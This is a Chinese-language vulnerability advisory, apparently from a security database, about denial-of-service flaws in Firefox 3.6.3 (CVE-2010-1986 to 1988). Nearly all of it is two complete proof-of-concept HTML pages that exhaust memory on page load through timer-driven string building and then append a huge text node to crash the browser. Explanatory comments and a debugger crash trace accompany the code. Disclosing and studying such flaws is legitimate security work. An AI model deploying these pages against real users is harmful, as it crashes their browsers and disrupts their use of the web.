CVE(CAN) ID: CVE-2010-1986,CVE-2010-1987,CVE-2010-1988
Firefox是非常流行的开源Web浏览器。
Firefox的xul.dll库中的gfxWindowsFontGroup::MakeTextRun函数以及USP10.dll库中的DoubleWideCharMappedString类存在多个拒绝服务漏洞。如果网页中的JavaScript代码先创建包含超长字符串元素的数组,然后再将超长字符串附加到P元素的内容中,就会触发内存破坏或空指针引用,导致浏览器崩溃。
Mozilla Firefox 3.6.3
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
[PoC #1 - firefox_3.6.3_dos_poc_1.htm]
<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">
// Builds a string of 0x700000 UTF-16 code units ("AAAA" appended 0x700000/4 times)
// and inserts it into <P id='p1'> as a single text node. The advisory text attributes
// the resulting crash to text-run creation (gfxWindowsFontGroup::MakeTextRun in xul.dll /
// DoubleWideCharMappedString in USP10.dll) while the process is under memory pressure.
function append_text_into_body()
{
var p1 = document.getElementById('p1');
var Text1 = "";
var TextNode = null;
// Trigger! MakeFont... into p element on body element.
// Each iteration produces a new, longer string value; the real allocation cost
// depends on the engine's string representation (ropes vs. flat copies) — not fixed here.
for(var i = 0; i < 0x700000 / 4; i++)
{
Text1 = Text1 + "AAAA";
}
TextNode = document.createTextNode(Text1);
p1.appendChild(TextNode); // Author's note: memory exhaustion leaves Firefox unable to build the text, which causes the crash.
}
// Shared state across timer ticks: arr1..arr5 receive one filler array each from
// fill_all_memory(); `a` is the step counter that selects which array to fill next (1..5)
// and afterwards counts ticks until the text append is triggered. `timer` is declared
// here but never assigned or read anywhere in this document.
var arr1, arr2, arr3, arr4, arr5;
var a = 1;
var timer;
// Called once per 500 ms tick from try_fill(). On steps 1..5 (selected by the global `a`)
// it fills one of arr1..arr5 with 0xd0 references to a large string; from step 6 on it
// increments `a` every tick and, once `a` reaches 30, calls append_text_into_body() on that
// tick and on every later tick. The large string is rebuilt on every call regardless of step,
// so each filled array ends up referencing a different string value.
function fill_all_memory()
{
// Two UTF-16 code units (U+4141 U+4141): length 2 before the doubling loop.
var chunk = unescape("%u4141%u4141");
var i = 0;
// The counter only advances here after all five arrays are filled (a == 6 after step 5).
if( a > 5 )
{
a++;
}
// Evaluated with the already-incremented value, so the append first fires on the tick where `a` becomes 30.
if(a >= 30)
{
append_text_into_body();
}
// Double until length exceeds 0x400000; the loop still runs at exactly 0x400000,
// so the last doubling leaves 0x800000 code units.
while(chunk.length <= 0x400000)
{
chunk = chunk + chunk;
}
// 3 * 0x800000 = 0x1800000 code units (24 MiB as UTF-16).
chunk = chunk + chunk + chunk;
// Full-range substring yields identical content; presumably meant to force the engine to
// flatten/copy the concatenated string — whether it does is engine-specific, verify before relying on it.
chunk = chunk.substring(0, chunk.length);
// One array per tick, each holding 0xd0 (208) references to this tick's `chunk`.
// NOTE(review): whether 208 references to one string cost more than one copy depends on
// the engine's string sharing; the per-tick rebuild of `chunk` is what guarantees fresh allocations.
if(a == 1)
{
arr1 = new Array();
for(i = 0; i < 0xd0; i++)
{
arr1[i] = chunk;
}
a = 2;
}
else if(a == 2)
{
arr2 = new Array();
for(i = 0; i < 0xd0; i++)
{
arr2[i] = chunk;
}
a = 3;
}
else if(a == 3)
{
arr3 = new Array();
for(i = 0; i < 0xd0; i++)
{
arr3[i] = chunk;
}
a = 4;
}
else if(a == 4)
{
arr4 = new Array();
for(i = 0; i < 0xd0; i++)
{
arr4[i] = chunk;
}
a = 5;
}
else if(a == 5)
{
arr5 = new Array();
for(i = 0; i < 0xd0; i++)
{
arr5[i] = chunk;
}
// Leaves the step range; the `a > 5` branch above takes over from the next tick.
a = 6;
}
}
// Timer loop: runs one fill step, then re-arms itself every 500 ms. The string form of
// setTimeout evaluates "try_fill();" as code on each tick (an implicit eval); passing the
// function reference, setTimeout(try_fill, 500), would do the same without it.
// Nothing in this document ever clears the timer.
function try_fill()
{
fill_all_memory();
setTimeout("try_fill();", 500);
}
</SCRIPT>
</HEAD>
<BODY onload="try_fill();">
<P id='p1'></P>
</BODY>
</HTML>
[PoC #2 - firefox_3.6.3_dos_poc_2.htm]
<HTML>
<HEAD>
<SCRIPT LANGUAGE="javascript">
// Builds a string of 0x700000 UTF-16 code units ("AAAA" appended 0x700000/4 times)
// and inserts it into <P id='p1'> as a single text node. In this PoC the function is
// invoked on every 10 ms tick, so a new 0x700000-unit text node is appended each time.
function append_text_into_body()
{
var p1 = document.getElementById('p1');
var Text1 = "";
var TextNode = null;
// Trigger! MakeFont... into p element on body element.
// Each iteration produces a new, longer string value; the allocation cost depends on
// the engine's string representation (ropes vs. flat copies) — not fixed here.
for(var i = 0; i < 0x700000 / 4; i++)
{
Text1 = Text1 + "AAAA";
}
TextNode = document.createTextNode(Text1);
p1.appendChild(TextNode); // Author's note: memory exhaustion leaves Firefox unable to build the text, which causes the crash.
}
// Leftovers from PoC #1: neither `a` nor `timer` is read or written by any function in this document.
var a = 1;
var timer;
// Called on every 10 ms tick from try_fill(). Unlike PoC #1 there is no step counter:
// append_text_into_body() runs on every call, and the large string built afterwards is a
// local that is neither stored nor returned, so it only adds transient allocation pressure
// (and whatever the engine's garbage collector does with it).
function fill_all_memory() // Author's note: a variation of this function can cause a null pointer dereference without calling append_text_into_body().
{
// Two UTF-16 code units (U+4141 U+4242): length 2 before the doubling loop.
var chunk = unescape("%u4141%u4242");
var i = 0;
append_text_into_body();
// Double until length exceeds 0x400000 (loop still runs at exactly 0x400000) -> 0x800000 code units.
while(chunk.length <= 0x400000)
{
chunk = chunk + chunk;
}
// 3 * 0x800000 = 0x1800000 code units; discarded when the function returns.
chunk = chunk + chunk + chunk;
// Full-range substring yields identical content; presumably meant to force a flatten/copy — engine-specific.
chunk = chunk.substring(0, chunk.length);
}
// Timer loop: one fill step, then re-arm every 10 ms (500 ms in PoC #1) using the string
// form of setTimeout (an implicit eval of "try_fill();"); the timer is never cleared.
function try_fill()
{
fill_all_memory();
// Author's note: this PoC crashes at almost the same location (~99% of runs) as shown below.
// 10: USP10!DoubleWideCharMappedString::operator[]+0x1f:
// 73f937cd 0fb70448 movzx eax,word ptr [eax+ecx*2] ds:0023:00133000=????
// The entries below appear to be the author's notes for other setTimeout intervals (ms);
// the results were left blank, so their meaning is not stated here.
// 100: ''
// 150: ''
// 200: ''
// 300: ''
// 500: ''
// 1000: ''
// 5000: ''
setTimeout("try_fill();", 10);
}
</SCRIPT>
</HEAD>
<BODY onload="try_fill();">
<P id='p1'></P>
</BODY>
</HTML>